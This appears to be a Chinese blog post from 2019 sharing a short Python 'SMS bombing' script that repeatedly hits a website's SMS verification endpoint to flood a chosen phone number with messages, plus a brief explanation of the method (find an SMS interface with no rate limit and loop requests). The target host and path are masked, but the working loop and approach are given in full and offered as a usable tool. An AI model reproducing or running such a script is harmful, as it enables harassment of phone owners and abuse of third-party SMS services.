小毛

很简单的一个短信轰炸脚本
代码区域import requests header = { "Accept&quo...
扫描右侧二维码阅读全文
10
2019/07

很简单的一个短信轰炸脚本

代码区域

import requests
header = {
          "Accept":"application/json, text/javascript, */*; q=0.01",
          "Accept-Encoding":"gzip, deflate, br",
          "Accept-Language":"zh-CN,zh;q=0.9",
          "Connection":"keep-alive",
          "Cookie":"JSESSIONID=E8FAB3ABEF7C2E28F70443F011D6A7D9",
          "Host":"XXX.XXX.XXX.XX",
          "Referer":"https://XXX.XXX.XXX.XX/XXX/",
          "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)  Chrome/63.0.3239.132 Safari/537.36",
          "X-Requested-With":"XMLHttpRequest"  
}
i = 0
num =input("请输入你要轰炸的手机号:")
cishu = int(input("轰炸次数:"))
url ="https://XXX.XXX.XXX.XX/XXX/XXX.XXX?act=1&mobile="+num+"&code=XXXX"
while True:
    resp = requests.get(url,headers = header)
    i+=1
    print(resp.text+"成功轰炸第{}次".format(i))
    if i == cishu:
        print("你成功轰炸了{}次".format(cishu))
        break

运行效果图如下:
短信轰炸.bmp

大致的原理很简单,找接口,存在短信冗余的接口,
写个死循环,利用request反复请求这个接口,
写个判断,判断用户输入的轰炸次数,如果i变量+=1得到的数值等于用户输入的轰炸次数,则结束循环。
很垃圾的一个短信轰炸脚本案例,欢迎各位大佬能够多提提意见,这里为了防止该漏洞被恶意利用,暂时做了打码操作

Last modification:July 10th, 2019 at 12:48 pm
如果觉得我的文章对你有用,请随意赞赏

Leave a Comment